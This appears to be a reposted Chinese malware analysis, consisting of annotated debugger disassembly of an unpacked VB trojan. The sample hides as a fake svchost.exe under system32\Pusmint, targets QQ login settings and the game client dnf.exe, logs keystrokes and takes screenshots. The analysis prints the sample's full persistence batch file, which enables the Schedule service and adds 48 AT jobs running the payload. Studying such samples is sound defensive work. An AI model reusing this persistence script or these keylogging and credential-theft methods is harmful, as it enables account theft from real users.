此為本人學習、無聊研究用,為了要備份文章,所以才發在這裡。
作者: 中國大陸-当红小生-
- 7339EDA9 . 50 push eax ; /pVersionInformation
- 7339EDAA . 33FF xor edi,edi ; |
- 7339EDAC . C785 54FFFFFF>mov dword ptr ss:[ebp-AC],94 ; |
- 7339EDB6 . FF15 CC103973 call dword ptr ds:[<&KERNEL32.GetVersion>; \GetVersionExA
- 7339EDBC . 33C0 xor eax,eax
- ......
- 7339EE1F . 8D85 68FFFFFF lea eax,dword ptr ss:[ebp-98]
- 7339EE25 . 68 589F3A73 push msvbvm60.733A9F58 ; Service pack
- 7339EE2A . 50 push eax
- 00406882 FF50 04 call dword ptr ds:[eax+4] ; msvbvm60.Zombie_AddRef
- 00406885 C745 FC 0100000>mov dword ptr ss:[ebp-4],1
- 0040688C C745 FC 0200000>mov dword ptr ss:[ebp-4],2
- 00406893 E8 48960000 call 脱壳后.0040FEE0 ; F7进去是获取目录
- 00406898 C745 FC 0300000>mov dword ptr ss:[ebp-4],3
- 0040689F 6A FF push -1 ; /OnErrEvent = Resume Next
- 004068A1 FF15 78F04100 call dword ptr ds:[<&msvbvm60.__vbaOnErr>; msvbvm60.__vbaOnError
- 004068A7 C745 FC 0400000>mov dword ptr ss:[ebp-4],4
- 004068AE 8B15 48504100 mov edx,dword ptr ds:[415048] ; (UNICODE "C:\WINDOWS\system32")
- 004068B4 52 push edx
- 004068B5 68 88324000 push 脱壳后.00403288 ; \Pusmint
- 004068BA FF15 48F04100 call dword ptr ds:[<&msvbvm60.__vbaStrCa>; msvbvm60.__vbaStrCat
- 004068C0 8BD0 mov edx,eax ; "C:\WINDOWS\system32\Pusmint")
- 004068C2 8D4D DC lea ecx,dword ptr ss:[ebp-24]
- 004068C5 FF15 F4F14100 call dword ptr ds:[<&msvbvm60.__vbaStrMo>; msvbvm60.__vbaStrMove
- 004068CB 50 push eax ; (UNICODE "C:\WINDOWS\system32\Pusmint")
- 004068CC FF15 40F14100 call dword ptr ds:[<&msvbvm60.rtcMakeDir>; F7
- 004068D2 8D4D DC lea ecx,dword ptr ss:[ebp-24] ; 创建目录
- 004068D5 FF15 18F24100 call dword ptr ds:[<&msvbvm60.__vbaFreeS>; msvbvm60.__vbaFreeStr
- 004068DB C745 FC 0500000>mov dword ptr ss:[ebp-4],5
- 004068E2 A1 48504100 mov eax,dword ptr ds:[415048]
- 004068E7 50 push eax
- 004068E8 68 B4324000 push 脱壳后.004032B4 ; \Pusmint\svchost.exe
- 004068ED FF15 48F04100 call dword ptr ds:[<&msvbvm60.__vbaStrCa>; msvbvm60.__vbaStrCat
- 004068F3 8BD0 mov edx,eax
- 004068F5 8D4D DC lea ecx,dword ptr ss:[ebp-24]
- 004068F8 FF15 F4F14100 call dword ptr ds:[<&msvbvm60.__vbaStrMo>; msvbvm60.__vbaStrMove
- 00406B9E FF15 70F14100 call dword ptr ds:[<&msvbvm60.rtcDir>] ; msvbvm60.rtcDir
- 00406BA4 8BD0 mov edx,eax ; (UNICODE "svchost.exe")
- 00406BA6 8D4D E0 lea ecx,dword ptr ss:[ebp-20]
- 00406BA9 FFD7 call edi ; (msvbvm60.__vbaStrMove)
- 00406BAB 50 push eax
- 00406BAC 68 3C334000 push 脱壳后.0040333C
- 00406BB1 FF15 BCF04100 call dword ptr ds:[<&msvbvm60.__vbaStr>; msvbvm60.__vbaStrCmp
- 00406BB7 8BF0 mov esi,eax
- 00406BB9 8D4D E0 lea ecx,dword ptr ss:[ebp-20]
- 00406BBC F7DE neg esi
- 00406BBE 1BF6 sbb esi,esi
- 00406BC0 46 inc esi
- 00406BC1 F7DE neg esi
- 00406BC3 FF15 18F24100 call dword ptr ds:[<&msvbvm60.__vbaFre>; msvbvm60.__vbaFreeStr
- 733BD096 . 51 push ecx ; /pLocalFileTime
- 733BD097 . 50 push eax ; |pFileTime
- 733BD098 . FF15 F0103973 call dword ptr ds:[<&KERNEL32.FileTime>; \FileTimeToLocalFileTime
- 733BD09E . 85C0 test eax,eax
- 733BD0A0 . 0F84 09B10100 je msvbvm60.733D81AF
- 733BD0A6 . 8D5424 08 lea edx,dword ptr ss:[esp+8]
- 733BD0AA . 8D4424 00 lea eax,dword ptr ss:[esp]
- 733BD0AE . 52 push edx ; /pSystemTime
- 733BD0AF . 50 push eax ; |pFileTime
- 733BD0B0 . FF15 F4103973 call dword ptr ds:[<&KERNEL32.FileTime>; \FileTimeToSystemTime
- 0041005C 8B35 A0F14100 mov esi,dword ptr ds:[<&msvbvm60.__vba>; msvbvm60.__vbaStrCopy
- 00410062 33FF xor edi,edi
- 00410064 8D4D D4 lea ecx,dword ptr ss:[ebp-2C]
- 00410067 897D EC mov dword ptr ss:[ebp-14],edi
- 0041006A 897D DC mov dword ptr ss:[ebp-24],edi
- 0041006D 897D D8 mov dword ptr ss:[ebp-28],edi
- 00410070 897D D4 mov dword ptr ss:[ebp-2C],edi
- 00410073 FFD6 call esi ; <&msvbvm60.__vbaStrCopy>
- 00410075 8B55 10 mov edx,dword ptr ss:[ebp+10]
- 00410078 8D4D EC lea ecx,dword ptr ss:[ebp-14]
- 0041007B FFD6 call esi ; (msvbvm60.__vbaStrCopy)
- 0041007D 8B45 D4 mov eax,dword ptr ss:[ebp-2C] ; "C:\Documents and Settings\Administrator\")
- 00410080 8B35 7CF14100 mov esi,dword ptr ds:[<&msvbvm60.__vba>; msvbvm60.__vbaFileOpen
- 00410086 50 push eax
- 00410087 6A 01 push 1
- 00410089 6A FF push -1
- 0041008B 68 20010000 push 120
- 00410090 FFD6 call esi ; <&msvbvm60.__vbaFileOpen>
- 00410092 57 push edi
- 00410093 6A 01 push 1
- 00410095 FF15 88F14100 call dword ptr ds:[<&msvbvm60.rtcFileL>; msvbvm60.rtcFileLength
- 0041009B 8B3D F8F04100 mov edi,dword ptr ds:[<&msvbvm60.__vba>; msvbvm60.__vbaRedim
- 004100A1 50 push eax
- 004100A2 6A 01 push 1
- 004100A4 8D4D D8 lea ecx,dword ptr ss:[ebp-28]
- 004100A7 6A 11 push 11
- 004100A9 51 push ecx
- 004100AA 6A 01 push 1
- 004100AC 68 80000000 push 80
- 004100B1 FFD7 call edi ; (msvbvm60.__vbaRedim)
- 004100B3 83C4 1C add esp,1C
- 004100B6 8D55 D8 lea edx,dword ptr ss:[ebp-28]
- 004100B9 6A 01 push 1
- 004100BB 52 push edx
- 004100BC 68 244A4000 push 脱壳后.00404A24
- 004100C1 FF15 50F14100 call dword ptr ds:[<&msvbvm60.__vbaGet>; msvbvm60.__vbaGetOwner3
- 004100C7 8B1D A4F04100 mov ebx,dword ptr ds:[<&msvbvm60.__vba>; msvbvm60.__vbaFileClose
- 004100CD 6A 01 push 1
- 004100CF FFD3 call ebx ; <&msvbvm60.__vbaFileClose>
- 004100D1 8B45 EC mov eax,dword ptr ss:[ebp-14]
- 004100D4 50 push eax
- 004100D5 6A 02 push 2
- 004100D7 6A FF push -1
- 004100D9 6A 20 push 20 ; 看函数名就知道有动作了。。。
- 004100DB FFD6 call esi ; (msvbvm60.__vbaFileOpen)
- 00407281 C745 FC 0900000>mov dword ptr ss:[ebp-4],9
- 00407288 6A FF push -1
- 0040728A FF15 78F04100 call dword ptr ds:[<&msvbvm60.__>; msvbvm60.__vbaOnError
- 00407290 C745 FC 0A00000>mov dword ptr ss:[ebp-4],0A
- 00407297 8B0D 48504100 mov ecx,dword ptr ds:[415048]
- 0040729D 51 push ecx
- 0040729E 68 F8364000 push 脱壳后.004036F8 ; \Pusmint\SystemDir.bat 东西还真不少
- 004072A3 FF15 48F04100 call dword ptr ds:[<&msvbvm60.__>; msvbvm60.__vbaStrCat
- 004072A9 8BD0 mov edx,eax
- 004072AB 8D4D C0 lea ecx,dword ptr ss:[ebp-40]
- 004072AE FF15 F4F14100 call dword ptr ds:[<&msvbvm60.__>; msvbvm60.__vbaStrMove
- 004072B4 50 push eax
- 004072B5 6A 01 push 1
- 004072B7 6A FF push -1
- 004072B9 6A 02 push 2
- 004072BB FF15 7CF14100 call dword ptr ds:[<&msvbvm60.__>; msvbvm60.__vbaFileOpen
- 004072C1 8D4D C0 lea ecx,dword ptr ss:[ebp-40]
- 004072C4 FF15 18F24100 call dword ptr ds:[<&msvbvm60.__>; msvbvm60.__vbaFreeStr
- {
- sc config Schedule start= AUTO
- net start schedule
- AT 0:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 1:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 2:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 3:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 4:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 5:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 6:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 7:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 8:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 9:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 10:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 11:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 12:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 13:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 14:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 15:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 16:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 17:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 18:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 19:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 20:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 21:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 22:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 23:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 0:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 1:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 2:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 3:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 4:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 5:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 6:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 7:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 8:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 9:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 10:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 11:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 12:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 13:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 14:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 15:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 16:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 17:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 18:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 19:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 20:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 21:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 22:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 23:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- }
我是分隔線
- 00402F43 00 db 00
- 00402F44 $ A1 FC564100 mov eax,dword ptr ds:[4156FC]
- 00402F49 . 0BC0 or eax,eax
- 00402F4B . 74 02 je short svchost.00402F4F
- 00402F4D . FFE0 jmp eax
- 00402F4F > 68 2C2F4000 push svchost.00402F2C ; FindWindowA
- 00402F54 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
- 00402F59 . FFD0 call eax
- 00402F5B . FFE0 jmp eax ; user32.FindWindowA
- 00402F5D 00 db 00
- 00402F5E 00 db 00
- 00403034 $ A1 20574100 mov eax,dword ptr ds:[415720]
- 00403039 . 0BC0 or eax,eax
- 0040303B . 74 02 je short svchost.0040303F
- 0040303D . FFE0 jmp eax
- 0040303F > 68 1C304000 push svchost.0040301C ; user32
- 00403044 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionCall>
- 00403049 . FFD0 call eax
- 0040304B . FFE0 jmp eax ; SendMessageA
- 0040307C $ A1 2C574100 mov eax,dword ptr ds:[41572C]
- 00403081 . 0BC0 or eax,eax
- 00403083 . 74 02 je short svchost.00403087
- 00403085 . FFE0 jmp eax
- 00403087 > 68 64304000 push svchost.00403064 ;
- 0040308C . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionCall>
- 00403091 . FFD0 call eax
- 00403093 . FFE0 jmp eax ; RtlMoveMemory
- 00403114 $ A1 44574100 mov eax,dword ptr ds:[415744]
- 00403119 . 0BC0 or eax,eax
- 0040311B . 74 02 je short svchost.0040311F
- 0040311D . FFE0 jmp eax
- 0040311F > 68 FC304000 push svchost.004030FC ;
- 00403124 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
- 00403129 . FFD0 call eax
- 0040312B . FFE0 jmp eax ; GetForegroundWindow
- 0040315C $ A1 50574100 mov eax,dword ptr ds:[415750]
- 00403161 . 0BC0 or eax,eax
- 00403163 . 74 02 je short svchost.00403167
- 00403165 . FFE0 jmp eax
- 00403167 > 68 44314000 push svchost.00403144 ; user32
- 0040316C . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
- 00403171 . FFD0 call eax
- 00403173 . FFE0 jmp eax ; GetWindowTextA
- 0040501F > \68 FC4F4000 push svchost.00404FFC ; GetClassNameA
- 00405024 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionCall>
- 00405029 . FFD0 call eax
- 0040502B . FFE0 jmp eax ; GetClassNameA
- 0040349C $ A1 A4574100 mov eax,dword ptr ds:[4157A4]
- 004034A1 . 0BC0 or eax,eax
- 004034A3 . 74 02 je short svchost.004034A7
- 004034A5 . FFE0 jmp eax
- 004034A7 > 68 84344000 push svchost.00403484 ; RegisterWindowMessageA
- 004034AC . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
- 004034B1 . FFD0 call eax
- 004034B3 . FFE0 jmp eax
- 0040344C $ A1 98574100 mov eax,dword ptr ds:[415798]
- 00403451 . 0BC0 or eax,eax
- 00403453 . 74 02 je short svchost.00403457
- 00403455 . FFE0 jmp eax
- 00403457 > 68 34344000 push svchost.00403434 ; RegisterShellHookWindow
- 0040345C . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunction>
- 00403461 . FFD0 call eax
- 00403463 . FFE0 jmp eax
- 00403543 > \68 20354000 push svchost.00403520 ; SetWindowLongA
- 00403548 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctio>
- 0040354D . FFD0 call eax
- 0040354F .- FFE0 jmp eax ; user32.SetWindowLongA
- 00402EA4 $ A1 F0564100 mov eax,dword ptr ds:[4156F0]
- 00402EA9 . 0BC0 or eax,eax
- 00402EAB . 74 02 je short svchost.00402EAF
- 00402EAD . FFE0 jmp eax
- 00402EAF > 68 8C2E4000 push svchost.00402E8C ; GetWindowThreadProcessId
- 00402EB4 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctio>
- 00402EB9 . FFD0 call eax
- 00402EBB .- FFE0 jmp eax ; user32.GetWindowThreadProcessId
- 00411639 . 6A 03 push 3 ; /varType = Long
- 0041163B . 8D45 C8 lea eax,dword ptr ss:[ebp-38] ; |
- 0041163E . 33FF xor edi,edi ; |
- 00411640 . 68 005B4000 push svchost.00405B00 ; |ArraySturctdes = svchost.00405B00
- 00411645 . 50 push eax ; |ArrayVar
- 00411646 . 897D E0 mov dword ptr ss:[ebp-20],edi ; |
- 00411649 . 897D BC mov dword ptr ss:[ebp-44],edi ; |
- 0041164C . 897D B8 mov dword ptr ss:[ebp-48],edi ; |
- 0041164F . 897D A8 mov dword ptr ss:[ebp-58],edi ; |
- 00411652 . 897D A4 mov dword ptr ss:[ebp-5C],edi ; |
- 00411655 . FF15 CCF04100 call dword ptr ds:[<&msvbvm60.__v>; \__vbaAryConstruct2
- 0041165B . 8B4D 08 mov ecx,dword ptr ss:[ebp+8]
- 0041165E . 51 push ecx
- 0041165F . 57 push edi
- 00411660 . 68 10040000 push 410
- 00411665 . E8 361BFFFF call svchost.004031A0 ; 打开进程
- {
- 004031A0 $ A1 5C574100 mov eax,dword ptr ds:[41575C]
- 004031A5 . 0BC0 or eax,eax
- 004031A7 . 74 02 je short svchost.004031AB
- 004031A9 . FFE0 jmp eax
- 004031AB > 68 88314000 push svchost.00403188 ; OpenProcess
- 004031B0 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctio>
- 004031B5 . FFD0 call eax
- 004031B7 .- FFE0 jmp eax ; kernel32.OpenProcess
- }
- 0041166A . 8B35 50F04100 mov esi,dword ptr ds:[<&msvbvm60.>; msvbvm60.__vbaSetSystemError
- 00411670 . 8945 A4 mov dword ptr ss:[ebp-5C],eax
- 00411673 . FFD6 call esi ; <&msvbvm60.__vbaSetSystemError>
- 004116A8 . FF15 A8F04100 call dword ptr ds:[<&msvbvm60.rtc>; msvbvm60.rtcSpaceVar
- 004116AE . 8D45 A8 lea eax,dword ptr ss:[ebp-58]
- 004116B1 . 50 push eax
- 004116B2 . FF15 18F04100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaStrVarMove
- 004116B8 . 8BD0 mov edx,eax
- 004116BA . 8D4D BC lea ecx,dword ptr ss:[ebp-44]
- 004116BD . FF15 F4F14100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaStrMove
- 004116C3 . 8D4D A8 lea ecx,dword ptr ss:[ebp-58]
- 004116C6 . FF15 10F04100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaFreeVar
- 004116CC . 8B4D BC mov ecx,dword ptr ss:[ebp-44]
- 004116CF . 68 F4010000 push 1F4
- 004116D4 . 8D55 B8 lea edx,dword ptr ss:[ebp-48]
- 004116D7 . 51 push ecx
- 004116D8 . 52 push edx
- 004116D9 . FF15 D8F14100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaStrToAnsi
- 00404B28 $ A1 F8574100 mov eax,dword ptr ds:[4157F8]
- 00404B2D . 0BC0 or eax,eax
- 00404B2F . 74 02 je short svchost.00404B33
- 00404B31 . FFE0 jmp eax
- 00404B7F > \68 5C4B4000 push svchost.00404B5C ; EnumProcessModules
- 00404B84 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionCall>
- 00404B89 . FFD0 call eax
- 00404B8B . FFE0 jmp eax ; EnumProcessModules
- 004116F9 . FF15 20F14100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaStrToUnicode
- 004116FF . 8D4D B8 lea ecx,dword ptr ss:[ebp-48]
- 00411702 . FF15 18F24100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaFreeStr
- 00411708 . 8B55 BC mov edx,dword ptr ss:[ebp-44]
- 0041170B . 8D4D E0 lea ecx,dword ptr ss:[ebp-20]
- 0041170E . FF15 A0F14100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaStrCopy
- 00403230 $ A1 74574100 mov eax,dword ptr ds:[415774]
- 00403235 . 0BC0 or eax,eax
- 00403237 . 74 02 je short svchost.0040323B
- 00403239 . FFE0 jmp eax
- 0040323B > 68 18324000 push svchost.00403218 ; CloseHandle
- 00403240 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunction>
- 00403245 . FFD0 call eax
- 00403247 . FFE0 jmp eax
- 0040C2BC . FF15 B8F04100 call dword ptr ds:[<&msvbvm60.rt>; msvbvm60.rtcUpperCaseVar
- 0040C2C2 . 6A 00 push 0
- 0040C2C4 . 6A FF push -1
- 0040C2C6 . 6A 01 push 1
- 0040C2C8 . 68 BC4B4000 push svchost.00404BBC ; UserSetting.ini
- 0040C2CD . 68 A04B4000 push svchost.00404BA0 ; QQLOGIN.EXE
- 0040C2D2 . 8D45 B8 lea eax,dword ptr ss:[ebp-48]
- 0040C2D5 . 50 push eax ; /String8
- 0040C2D6 . 8D4D D0 lea ecx,dword ptr ss:[ebp-30] ; |
- 0040C2D9 . 51 push ecx ; |ARG2 = 0012FB48
- 0040C2DA . FF15 54F14100 call dword ptr ds:[<&msvbvm60.__>; \__vbaStrVarVal
- 0040C322 . FF15 B8F04100 call dword ptr ds:[<&msvbvm60.rt>; msvbvm60.rtcUpperCaseVar
- 0040C328 . 6A 00 push 0
- 0040C32A . 6A FF push -1
- 0040C32C . 6A 01 push 1
- 0040C32E . 68 E04B4000 push svchost.00404BE0 ; config\Info.ini
- 0040C333 . 68 A04B4000 push svchost.00404BA0 ; QQLOGIN.EXE
- 0040C338 . 8D55 B8 lea edx,dword ptr ss:[ebp-48]
- 0040C33B . 52 push edx ; /String8
- 0040C33C . 8D45 D0 lea eax,dword ptr ss:[ebp-30] ; |
- 0040C33F . 50 push eax ; |ARG2
- 0040C340 . FF15 54F14100 call dword ptr ds:[<&msvbvm60.__>; \__vbaStrVarVal
- 0040C673 . BA 044C4000 mov edx,svchost.00404C04 ; dnf.exe
- 0040C678 . 8D4D CC lea ecx,dword ptr ss:[ebp-34]
- 0040C67B . FF15 A0F14100 call dword ptr ds:[<&msvbvm60.__vbaStrCo>; msvbvm60.__vbaStrCopy
- 0040C681 . 8D55 CC lea edx,dword ptr ss:[ebp-34]
- 00404C6F > \68 4C4C4000 push svchost.00404C4C ; CreateToolhelp32Snapshot
- 00404C74 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionCal>
- 00404C79 . FFD0 call eax
- 00404C7B .- FFE0 jmp eax ; kernel32.CreateToolhelp32Snapshot
- 00404CD3 > \68 B04C4000 push svchost.00404CB0 ; Process32First
- 00404CD8 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
- 00404CDD . FFD0 call eax
- 00404CDF . FFE0 jmp eax ; Process32First
- 00404D1B > \68 F84C4000 push svchost.00404CF8 ; Process32Next
- 00404D20 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
- 00404D25 . FFD0 call eax
- 00404D27 .- FFE0 jmp eax ; kernel32.Process32Next
- 0040C685 . E8 064C0000 call svchost.00411290 ; 创建快照
- 0040C68A . 8945 D8 mov dword ptr ss:[ebp-28],eax
- 0040C68D . 8D4D CC lea ecx,dword ptr ss:[ebp-34]
- 0040C690 . FF15 18F24100 call dword ptr ds:[<&msvbvm60.__vba>; msvbvm60.__vbaFreeStr
- 0040C696 . C745 FC 03000>mov dword ptr ss:[ebp-4],3
- 0040C69D . 837D D8 00 cmp dword ptr ss:[ebp-28],0
- 0040C6A1 . 0F84 62240000 je svchost.0040EB09 ; 这个是判断是否有DNF.exe
- 0040C6A7 . C745 FC 04000>mov dword ptr ss:[ebp-4],4
- 004034FB > \68 D8344000 push svchost.004034D8 ; DeregisterShellHookWindow
- 00403500 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
- 00403505 . FFD0 call eax
- 00403507 . FFE0 jmp eax
- 733A03F6 BB B8A63A73 mov ebx,msvbvm60.733AA6B8 ; ThunderRT6Main
- 733A03FB 50 push eax
- 733A03FC 53 push ebx
- 733A03FD FF35 D0064A73 push dword ptr ds:[734A06D0] ; msvbvm60.73390000
- 733A0403 FF15 F8123973 call dword ptr ds:[<&USER32.GetClassI>; user32.GetClassInfoExA
- 733A0409 33F6 xor esi,esi
- 733A040B 85C0 test eax,eax
- 733A040D 75 71 jnz short msvbvm60.733A0480
- 733A040F 6A 0C push 0C
- 733A0411 8D7D CC lea edi,dword ptr ss:[ebp-34]
- 733A0414 59 pop ecx
- 733A0415 6A 01 push 1
- 733A0417 FF35 D4064A73 push dword ptr ds:[734A06D4] ; svchost.00400000
- 733A130E . BF 10A93A73 mov edi,msvbvm60.733AA910 ; ASCII "VBMsoStdCompMgr"
- 733A1313 . 68 55133A73 push msvbvm60.733A1355
- 733A1318 . 57 push edi
- 733A1319 . E8 7DDEFFFF call msvbvm60.7339F19B
- 004035D0 $ A1 D4574100 mov eax,dword ptr ds:[4157D4]
- 004035D5 . 0BC0 or eax,eax
- 004035D7 . 74 02 je short svchost.004035DB
- 004035D9 . FFE0 jmp eax
- 004035DB > 68 B8354000 push svchost.004035B8 ; user32
- 004035E0 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionCall>
- 004035E5 . FFD0 call eax
- 004035E7 . FFE0 jmp eax ; GetWindowTextLengthW
- 0040364D . 0BC0 or eax,eax
- 0040364F . 74 02 je short svchost.00403653
- 00403651 . FFE0 jmp eax
- 00403653 > 68 30364000 push svchost.00403630 ; user32
- 00403658 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionCall>
- 0040365D . FFD0 call eax
- 0040365F . FFE0 jmp eax ; GetKeyState
- 00403690 $ A1 EC574100 mov eax,dword ptr ds:[4157EC]
- 00403695 . 0BC0 or eax,eax
- 00403697 . 74 02 je short svchost.0040369B
- 00403699 . FFE0 jmp eax
- 0040369B > 68 78364000 push svchost.00403678 ; user32
- 004036A0 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionCall>
- 004036A5 . FFD0 call eax
- 004036A7 . FFE0 jmp eax ; MapVirtualKeyA
- 7340CEF2 |. 56 push esi ; /lParam
- 7340CEF3 |. FF75 0C push [arg.2] ; |wParam
- 7340CEF6 |. FF75 08 push [arg.1] ; |HookCode
- 7340CEF9 |. FFB0 6C020000 push dword ptr ds:[eax+26C] ; |hHook
- 7340CEFF |. FF15 C8143973 call dword ptr ds:[<&USER32.CallNex>; \CallNextHookEx
- 004033B0 $ A1 80574100 mov eax,dword ptr ds:[415780]
- 004033B5 . 0BC0 or eax,eax
- 004033B7 . 74 02 je short svchost.004033BB
- 004033B9 . FFE0 jmp eax
- 004033BB > 68 98334000 push svchost.00403398 ; user32
- 004033C0 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionCall>
- 004033C5 . FFD0 call eax
- 004033C7 . FFE0 jmp eax ; GetDC
- 733A1BAF . 57 push edi ; /hDC => NULL
- 733A1BB0 . FF15 D0163973 call dword ptr ds:[<&GDI32.CreateCompati>; \CreateCompatibleDC
- 733A1BB6 . 3BC7 cmp eax,edi
- 733A1BB8 . 8986 640E0000 mov dword ptr ds:[esi+E64],eax
- 733A1BBE . 0F84 6F590200 je msvbvm60.733C7533
- 733A1BC4 . 6A 07 push 7 ; /ObjectType = OBJ_BITMAP
- 733A1BC6 . 50 push eax ; |hDC
- 733A1BC7 . FF15 50173973 call dword ptr ds:[<&GDI32.GetCurrentObj>; \GetCurrentObject
- 004059AB > \68 88594000 push svchost.00405988 ; GDIPlus
- 004059B0 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionCall>
- 004059B5 . FFD0 call eax
- 004059B7 . FFE0 jmp eax ; GdipSaveImageToFile
- 0040D51A . 68 704E4000 push svchost.00404E70 ; /\Pusmint\jietu.jpg
- 0040D51F . FF15 48F04100 call dword ptr ds:[<&msvbvm60.__vbaStrCa>; \__vbaStrCat
- 0040D525 . 8945 A0 mov dword ptr ss:[ebp-60],eax
- 0040D528 . C745 98 08000>mov dword ptr ss:[ebp-68],8
- 0040D52F . 6A 00 push 0
- 0040D531 . 8D55 98 lea edx,dword ptr ss:[ebp-68]
- 0040D534 . 52 push edx
